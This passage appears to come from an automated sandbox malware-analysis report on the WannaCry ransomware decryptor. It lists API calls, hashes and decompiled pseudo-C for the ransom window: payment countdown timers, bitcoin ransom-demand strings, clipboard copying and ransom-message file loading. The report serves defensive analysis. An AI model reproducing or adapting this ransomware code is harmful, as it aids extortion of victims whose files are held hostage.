                                  • wcslen.MSVCRT ref: 00403753
                                  • wcslen.MSVCRT ref: 0040377B
                                  • #800.MFC42 ref: 00403797
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
                                  • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
                                  • EmptyClipboard.USER32 ref: 004037D4
                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
                                  • CloseClipboard.USER32 ref: 004037E3
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#800ClipboardGlobal$#3301#924wcslen$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
                                  • String ID:
                                  • API String ID: 3405503685-0
                                  • Opcode ID: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                  • Instruction ID: c86228cefcec1f34603e32cf9825c4429cf2ad1f23db843e272d7cdac5f24a66
                                  • Opcode Fuzzy Hash: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                  • Instruction Fuzzy Hash: 0151E571204706ABD320DF64DC45FEBB7A8FB88754F10462DF249A72D0DB749909CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004076A0 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 239windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E004076A0(void* __ecx) {
				intOrPtr _t89;
				char _t90;
				intOrPtr _t91;
				signed int _t94;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t125;
				signed int _t133;
				void* _t136;
				intOrPtr _t139;
				signed int _t143;
				signed int _t147;
				void* _t148;
				intOrPtr _t161;
				signed int _t192;
				intOrPtr _t193;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				intOrPtr _t200;
				intOrPtr _t202;
				void* _t204;
				intOrPtr _t206;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t213;
				long long _t225;

				_push(0xffffffff);
				_push(E00413EBB);
				_t89 =  *[fs:0x0];
				_push(_t89);
				 *[fs:0x0] = _t206;
				_t207 = _t206 - 0x8c;
				_t196 = 0;
				_t136 = __ecx;
				 *((intOrPtr*)(_t207 + 0x14)) = 0;
				 *((intOrPtr*)(_t207 + 0x18)) = 0;
				 *(_t207 + 0x1c) = 0;
				 *(_t207 + 0x20) = 0;
				_t204 = 0;
				L2:
				__imp__time(_t196);
				_t139 = M00421120; // 0x30303b30
				_t161 = _t89;
				_t90 = "00;00;00;00"; // 0x303b3030
				 *((intOrPtr*)(_t207 + 0x40)) = _t139;
				 *(_t207 + 0x3c) = _t90;
				_t91 =  *0x421124; // 0x30303b
				 *((intOrPtr*)(_t207 + 0x44)) = _t91;
				_t208 = _t207 + 4;
				 *(_t208 + 0x24) = _t196;
				memset(_t208 + 0x44, 0, 0x16 << 2);
				_t209 = _t208 + 0xc;
				if(_t204 != 0) {
					_t94 =  *(_t136 + 0x580);
				} else {
					_t94 =  *(_t136 + 0x57c);
				}
				_t98 =  *((intOrPtr*)(_t136 + 0x578));
				_t143 = _t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4) * 8 << 7;
				if(_t161 <= _t98) {
					_t99 =  *(_t209 + 0x24);
				} else {
					_t133 = _t98 - _t161 + _t143;
					_t196 = _t133;
					if(_t196 <= 0) {
						_t99 =  *(_t209 + 0x24);
					} else {
						asm("cdq");
						_t99 = _t133 * 0x64 / _t143;
					}
					if(_t196 < 0) {
						_t196 = 0;
					}
				}
				if(_t204 != 0) {
					 *(_t209 + 0x20) = _t99;
				} else {
					 *(_t209 + 0x14) = _t196;
					 *(_t209 + 0x1c) = _t99;
				}
				 *(_t209 + 0x2e) = ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10) + ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10 >> 0x1f);
				_t147 =  *(_t209 + 0x2e) & 0x0000ffff;
				_t197 = _t196 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4) * 8 << 7);
				 *(_t209 + 0x30) = ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb) + ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb >> 0x1f);
				_t192 =  *(_t209 + 0x30) & 0x0000ffff;
				_t198 = _t197 + _t192 * 0xfffff1f0;
				 *(_t209 + 0x32) = ((0x88888889 * _t198 >> 0x20) + _t198 >> 5) + ((0x88888889 * _t198 >> 0x20) + _t198 >> 5 >> 0x1f);
				sprintf(_t209 + 0x48, "%02d;%02d;%02d;%02d", _t147, _t192,  *(_t209 + 0x32) & 0x0000ffff, _t198 +  ~((( *(_t209 + 0x32) & 0x0000ffff) << 4) - ( *(_t209 + 0x32) & 0x0000ffff)) * 4);
				_t207 = _t209 + 0x18;
				if(_t204 != 0) {
					_t148 = _t136 + 0x444;
					_push(_t207 + 0x38);
				} else {
					_push(_t207 + 0x38);
					_t148 = _t136 + 0x3c8;
				}
				_t89 = E00405180(_t148);
				_t204 = _t204 + 1;
				if(_t204 < 2) {
					_t196 = 0;
					goto L2;
				}
				SendMessageA( *(_t136 + 0x140), 0x402,  *(_t207 + 0x1c), 0);
				SendMessageA( *(_t136 + 0x1c4), 0x402,  *(_t207 + 0x20), 0);
				L00412DA6();
				 *(_t207 + 0xa4) = 0;
				_t225 =  *((intOrPtr*)(_t136 + 0x584));
				if( *((intOrPtr*)(_t207 + 0x14)) <= 0) {
					_t225 = _t225 + st0;
					 *(_t136 + 0x818) = 1;
				}
				_t124 =  *((intOrPtr*)(_t136 + 0x588));
				if(_t124 != 0) {
					 *((long long*)(_t207 + 0x14)) = _t225;
					_t200 =  *((intOrPtr*)(_t207 + 0x18));
					_t193 =  *((intOrPtr*)(_t207 + 0x14));
					_push(_t200);
					_push(_t193);
					_t124 = _t136 + 0x81c;
					_push("%.1f BTC");
					_push(_t136 + 0x81c);
					L00412E00();
					_t210 = _t207 + 0x10;
					_push(_t200);
					_push(_t193);
					_push("Send %.1f BTC to this address:");
					_push(_t210 + 0x10);
					L00412E00();
					_t211 = _t210 + 0x10;
				} else {
					L0041304A();
					_t202 = _t124;
					_push(_t202);
					_push("$%d");
					_push(_t136 + 0x81c);
					L00412E00();
					_t213 = _t207 + 0xc;
					_push(_t202);
					_push("Send $%d worth of bitcoin to this address:");
					_push(_t213 + 0x10);
					L00412E00();
					_t211 = _t213 + 0xc;
				}
				_push( *((intOrPtr*)(_t211 + 0x10)));
				_push(0x402);
				L00412CE6();
				L00412CE0();
				_t125 =  *((intOrPtr*)(_t136 + 0x824));
				 *((intOrPtr*)(_t136 + 0x824)) = 0x121284;
				if(_t125 != 0x121284) {
					E004079C0(_t136);
					_t125 =  *((intOrPtr*)(_t211 + 0xac));
					if(_t125 != 0) {
						InvalidateRect( *(_t136 + 0x20), 0, 1);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						E00405920(_t136 + 0x3c8,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						_t125 = E00405920(_t136 + 0x444,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
					}
				}
				 *((intOrPtr*)(_t211 + 0xa4)) = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] =  *((intOrPtr*)(_t211 + 0x9c));
				return _t125;
			}

































                                  0x004076a0
                                  0x004076a2
                                  0x004076a7
                                  0x004076ad
                                  0x004076ae
                                  0x004076b5
                                  0x004076be
                                  0x004076c1
                                  0x004076c3
                                  0x004076c7
                                  0x004076cb
                                  0x004076cf
                                  0x004076d3
                                  0x004076d9
                                  0x004076da
                                  0x004076e0
                                  0x004076e6
                                  0x004076e8
                                  0x004076ed
                                  0x004076f1
                                  0x004076f5
                                  0x004076fa
                                  0x004076fe
                                  0x0040770c
                                  0x00407712
                                  0x00407712
                                  0x00407714
                                  0x0040771e
                                  0x00407716
                                  0x00407716
                                  0x00407716
                                  0x00407730
                                  0x00407736
                                  0x0040773b
                                  0x0040775b
                                  0x0040773d
                                  0x0040773f
                                  0x00407741
                                  0x00407745
                                  0x0040774f
                                  0x00407747
                                  0x0040774a
                                  0x0040774b
                                  0x0040774b
                                  0x00407755
                                  0x00407757
                                  0x00407757
                                  0x00407755
                                  0x00407761
                                  0x0040776d
                                  0x00407763
                                  0x00407763
                                  0x00407767
                                  0x00407767
                                  0x00407784
                                  0x0040778d
                                  0x004077aa
                                  0x004077bf
                                  0x004077c8
                                  0x004077d6
                                  0x004077e6
                                  0x0040780e
                                  0x00407814
                                  0x00407819
                                  0x0040782c
                                  0x00407832
                                  0x0040781b
                                  0x0040781f
                                  0x00407820
                                  0x00407820
                                  0x00407833
                                  0x00407838
                                  0x0040783c
                                  0x004076d7
                                  0x00000000
                                  0x004076d7
                                  0x0040785b
                                  0x00407870
                                  0x00407876
                                  0x0040787f
                                  0x0040788a
                                  0x00407892
                                  0x00407894
                                  0x00407896
                                  0x00407896
                                  0x004078a0
                                  0x004078a8
                                  0x004078db
                                  0x004078df
                                  0x004078e3
                                  0x004078e7
                                  0x004078e8
                                  0x004078e9
                                  0x004078ef
                                  0x004078f4
                                  0x004078f5
                                  0x004078fa
                                  0x00407901
                                  0x00407902
                                  0x00407903
                                  0x00407908
                                  0x00407909
                                  0x0040790e
                                  0x004078aa
                                  0x004078aa
                                  0x004078af
                                  0x004078b7
                                  0x004078b8
                                  0x004078bd
                                  0x004078be
                                  0x004078c3
                                  0x004078ca
                                  0x004078cb
                                  0x004078d0
                                  0x004078d1
                                  0x004078d6
                                  0x004078d6
                                  0x00407917
                                  0x00407918
                                  0x0040791d
                                  0x00407924
                                  0x00407929
                                  0x0040792f
                                  0x0040793e
                                  0x00407942
                                  0x00407947
                                  0x00407950
                                  0x0040795a
                                  0x0040796c
                                  0x00407973
                                  0x00407984
                                  0x0040798b
                                  0x0040798b
                                  0x00407950
                                  0x00407994
                                  0x0040799f
                                  0x004079af
                                  0x004079bc

                                  APIs
                                  • time.MSVCRT ref: 004076DA
                                  • sprintf.MSVCRT ref: 0040780E
                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
                                  • #540.MFC42 ref: 00407876
                                  • _ftol.MSVCRT ref: 004078AA
                                  • #2818.MFC42(?,$%d,00000000), ref: 004078BE
                                  • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
                                  • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
                                  • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
                                  • #3092.MFC42(00000402,?), ref: 0040791D
                                  • #6199.MFC42(00000402,?), ref: 00407924
                                  • InvalidateRect.USER32(?,00000000,00000001,00000402,?), ref: 0040795A
                                  • #800.MFC42 ref: 0040799F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2818$MessageSend$#3092#540#6199#800InvalidateRect_ftolsprintftime
                                  • String ID: $%d$%.1f BTC$%02d;%02d;%02d;%02d$00;00;00;00$Send $%d worth of bitcoin to this address:$Send %.1f BTC to this address:
                                  • API String ID: 993288296-3256873439
                                  • Opcode ID: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                  • Instruction ID: 9b53b323f570066dafa0cf34324f53a17123da88a1e7ff32529d6bfb7c89d06c
                                  • Opcode Fuzzy Hash: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                  • Instruction Fuzzy Hash: 3281D4B1A043019BD720DF18C981FAB77E9EF88700F04893EF949DB395DA74A9058B96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405E10 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 144COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E00405E10(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				void* _t86;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				intOrPtr _t132;

				_push(0xffffffff);
				_push(E00413C65);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t132;
				_v20 = __ecx;
				_v4 = 0;
				_t121 = __ecx + 0x890;
				_v16 = _t121;
				 *_t121 = 0x415c00;
				_v4 = 0x1d;
				L00412D52();
				 *_t121 = 0x415bec;
				_t122 = __ecx + 0x888;
				_v16 = _t122;
				 *_t122 = 0x415c00;
				_v4 = 0x1e;
				L00412D52();
				 *_t122 = 0x415bec;
				_t123 = __ecx + 0x880;
				_v16 = _t123;
				 *_t123 = 0x415c00;
				_v4 = 0x1f;
				L00412D52();
				 *_t123 = 0x415bec;
				_t124 = __ecx + 0x878;
				_v16 = _t124;
				 *_t124 = 0x415c00;
				_v4 = 0x20;
				L00412D52();
				 *_t124 = 0x415bec;
				_v4 = 0x18;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
				E00403F20(__ecx + 0x870);
				_v4 = 0x17;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				E00403F20(__ecx + 0x868);
				_v4 = 0x16;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				E00403F20(__ecx + 0x860);
				_v4 = 0x15;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				E00403F20(__ecx + 0x858);
				_t125 = __ecx + 0x850;
				_v16 = _t125;
				 *_t125 = 0x415c00;
				_v4 = 0x21;
				L00412D52();
				 *_t125 = 0x415bec;
				_v4 = 0x13;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				E00403F20(__ecx + 0x848);
				_v4 = 0x12;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				E00403F20(__ecx + 0x840);
				_v4 = 0x11;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				E00403F20(__ecx + 0x838);
				_t126 = __ecx + 0x830;
				_v16 = _t126;
				 *_t126 = 0x415c00;
				_v4 = 0x22;
				L00412D52();
				 *_t126 = 0x415bec;
				_v4 = 0xf;
				L00412CC2();
				_v4 = 0xe;
				L00412CC2();
				_v4 = 0xd;
				L00412CC2();
				_v4 = 0xc;
				L00412CC2();
				_v4 = 0xb;
				L00412EF6();
				_v4 = 0xa;
				E004050A0(__ecx + 0x444);
				_v4 = 9;
				E004050A0(__ecx + 0x3c8);
				_v4 = 8;
				E00404170(__ecx + 0x360);
				_v4 = 7;
				E00404170(__ecx + 0x2f8);
				_v4 = 6;
				E00404170(__ecx + 0x290);
				_v4 = 5;
				E00404170(__ecx + 0x228);
				_t127 = __ecx + 0x1a4;
				_v16 = _t127;
				 *_t127 = 0x4161a4;
				_v4 = 0x23;
				L00412F0E();
				_v4 = 4;
				L00412C9E();
				_v4 = 3;
				_t86 = E00405D90(__ecx + 0x120);
				_v4 = 2;
				L00412EF0();
				_v4 = 1;
				L00412EF0();
				_v4 = 0;
				L00412D4C();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t86;
			}
















                                  0x00405e10
                                  0x00405e12
                                  0x00405e1d
                                  0x00405e1e
                                  0x00405e2c
                                  0x00405e30
                                  0x00405e38
                                  0x00405e3e
                                  0x00405e42
                                  0x00405e4a
                                  0x00405e4f
                                  0x00405e54
                                  0x00405e5a
                                  0x00405e60
                                  0x00405e64
                                  0x00405e6c
                                  0x00405e71
                                  0x00405e76
                                  0x00405e7c
                                  0x00405e82
                                  0x00405e86
                                  0x00405e8e
                                  0x00405e93
                                  0x00405e98
                                  0x00405e9e
                                  0x00405ea4
                                  0x00405ea8
                                  0x00405eb0
                                  0x00405eb5
                                  0x00405ec0
                                  0x00405ec6
                                  0x00405ecb
                                  0x00405ed1
                                  0x00405edc
                                  0x00405ee1
                                  0x00405ee7
                                  0x00405ef2
                                  0x00405ef7
                                  0x00405efd
                                  0x00405f08
                                  0x00405f0d
                                  0x00405f13
                                  0x00405f18
                                  0x00405f1e
                                  0x00405f22
                                  0x00405f2a
                                  0x00405f2f
                                  0x00405f3a
                                  0x00405f40
                                  0x00405f45
                                  0x00405f4b
                                  0x00405f56
                                  0x00405f5b
                                  0x00405f61
                                  0x00405f6c
                                  0x00405f71
                                  0x00405f77
                                  0x00405f7c
                                  0x00405f82
                                  0x00405f86
                                  0x00405f8e
                                  0x00405f93
                                  0x00405f9e
                                  0x00405fa4
                                  0x00405fa9
                                  0x00405fb4
                                  0x00405fb9
                                  0x00405fc4
                                  0x00405fc9
                                  0x00405fd4
                                  0x00405fd9
                                  0x00405fe4
                                  0x00405fe9
                                  0x00405ff4
                                  0x00405ff9
                                  0x00406004
                                  0x00406009
                                  0x00406014
                                  0x00406019
                                  0x00406024
                                  0x00406029
                                  0x00406034
                                  0x00406039
                                  0x00406044
                                  0x00406049
                                  0x0040604e
                                  0x00406054
                                  0x00406058
                                  0x00406061
                                  0x00406066
                                  0x0040606d
                                  0x00406072
                                  0x0040607d
                                  0x00406082
                                  0x0040608d
                                  0x00406092
                                  0x0040609d
                                  0x004060a2
                                  0x004060aa
                                  0x004060af
                                  0x004060b6
                                  0x004060be
                                  0x004060c9
                                  0x004060d3

                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
                                    • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
                                  • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
                                    • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                    • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                    • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                    • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                  • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
                                  • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
                                    • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                    • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                  • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
                                  • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
                                  • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
                                  • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#800$#609#654#765#795$#616#641#781
                                  • String ID: #
                                  • API String ID: 2377847243-1885708031
                                  • Opcode ID: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                  • Instruction ID: 200a364df958368678b01019567048f7f095356612ddb79f46c50176d87071e4
                                  • Opcode Fuzzy Hash: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                  • Instruction Fuzzy Hash: C4710A74008782CED305EF65C0453DAFFE4AFA5348F54484EE0DA57292DBB86299CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004032C0 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 114windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 69%
                                  			E004032C0(intOrPtr __ecx) {
				intOrPtr _t16;
				long _t17;
				struct HFONT__* _t19;
				long _t20;
				long _t21;
				long _t23;
				int _t35;
				int _t38;
				int _t40;
				int _t47;
				intOrPtr _t48;

				_t48 = __ecx;
				L00412CB0();
				_t16 =  *0x42189c; // 0x0
				_t17 =  *(_t16 + 0x824);
				 *(__ecx + 0xe8) = _t17;
				_push(CreateSolidBrush(_t17));
				L00412D5E();
				_t47 = __ecx + 0xec;
				_t19 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t19);
				L00412D5E();
				_push(0x408);
				L00412CE6();
				if(_t47 != 0) {
					_t35 =  *(_t47 + 4);
				} else {
					_t35 = 0;
				}
				_t20 = SendMessageA( *(_t19 + 0x20), 0x30, _t35, 1);
				_push(0x409);
				L00412CE6();
				if(_t47 != 0) {
					_t38 =  *(_t47 + 4);
				} else {
					_t38 = 0;
				}
				_t21 = SendMessageA( *(_t20 + 0x20), 0x30, _t38, 1);
				_push(2);
				L00412CE6();
				if(_t47 != 0) {
					_t40 =  *(_t47 + 4);
				} else {
					_t40 = 0;
				}
				_t23 = SendMessageA( *(_t21 + 0x20), 0x30, _t40, 1);
				_push(0x40e);
				L00412CE6();
				if(_t47 != 0) {
					_t47 =  *(_t47 + 4);
				}
				SendMessageA( *(_t23 + 0x20), 0x30, _t47, 1);
				E00403CB0(_t48);
				SendMessageA( *(_t48 + 0xc0), 0x14e, 0, 0);
				_push(0xffffffff);
				_push(0xffffffff);
				_push(0);
				_push("Path");
				_push(0);
				L00412D58();
				SendMessageA( *(_t48 + 0x80), 0x101e, 0, 0x1f4);
				 *0x4217bc = _t48;
				return 1;
			}














                                  0x004032c3
                                  0x004032c5
                                  0x004032ca
                                  0x004032cf
                                  0x004032d6
                                  0x004032e2
                                  0x004032e9
                                  0x00403310
                                  0x00403316
                                  0x0040331c
                                  0x0040331f
                                  0x00403324
                                  0x0040332b
                                  0x00403332
                                  0x00403338
                                  0x00403334
                                  0x00403334
                                  0x00403334
                                  0x0040334a
                                  0x0040334c
                                  0x00403353
                                  0x0040335a
                                  0x00403360
                                  0x0040335c
                                  0x0040335c
                                  0x0040335c
                                  0x0040336c
                                  0x0040336e
                                  0x00403372
                                  0x00403379
                                  0x0040337f
                                  0x0040337b
                                  0x0040337b
                                  0x0040337b
                                  0x0040338b
                                  0x0040338d
                                  0x00403394
                                  0x0040339b
                                  0x0040339d
                                  0x0040339d
                                  0x004033a9
                                  0x004033ad
                                  0x004033c2
                                  0x004033c4
                                  0x004033c6
                                  0x004033c8
                                  0x004033ca
                                  0x004033cf
                                  0x004033d4
                                  0x004033ec
                                  0x004033ee
                                  0x004033fc

                                  APIs
                                  • #4710.MFC42 ref: 004032C5
                                  • CreateSolidBrush.GDI32(?), ref: 004032DC
                                  • #1641.MFC42(00000000), ref: 004032E9
                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
                                  • #1641.MFC42(00000000), ref: 0040331F
                                  • #3092.MFC42(00000408,00000000), ref: 0040332B
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
                                  • #3092.MFC42(00000409), ref: 00403353
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
                                  • #3092.MFC42(00000002), ref: 00403372
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
                                  • #3092.MFC42(0000040E), ref: 00403394
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
                                  • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
                                  • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092$#1641Create$#3996#4710BrushFontSolid
                                  • String ID: Arial$Path
                                  • API String ID: 2448086372-1872211634
                                  • Opcode ID: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                  • Instruction ID: b960ea7794e319caf0268359e71fff6d42033abaa4d887be80586a06fbef81fd
                                  • Opcode Fuzzy Hash: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                  • Instruction Fuzzy Hash: 4831D5B13907107BE6249760CD83FAE6659BB84B10F20421EB756BF2D1CEF8AD41879C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406AE0 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 78COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00406AE0(void* __ecx) {
				char _v4;
				char _v12;
				char _v24;
				char _v28;
				intOrPtr _v36;
				char _v40;
				void* _v280;
				char _v284;
				char _v288;
				char _v292;
				void* _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				void* _v312;
				void* _v316;
				char** _t26;
				long _t30;
				void* _t31;
				char** _t32;
				void* _t56;
				intOrPtr _t58;
				void* _t60;

				_push(0xffffffff);
				_push(E00413E61);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_t56 = __ecx;
				L00412DA6();
				_t26 =  &_v284;
				_push(_t26);
				_v4 = 0;
				L00412DD6();
				_push("msg\\");
				L00412CAA();
				_push("m_%s.wnry");
				_push(_t26);
				_push( &_v288);
				_v12 = 1;
				L00412CCE();
				sprintf( &_v292,  *_t26, _v304);
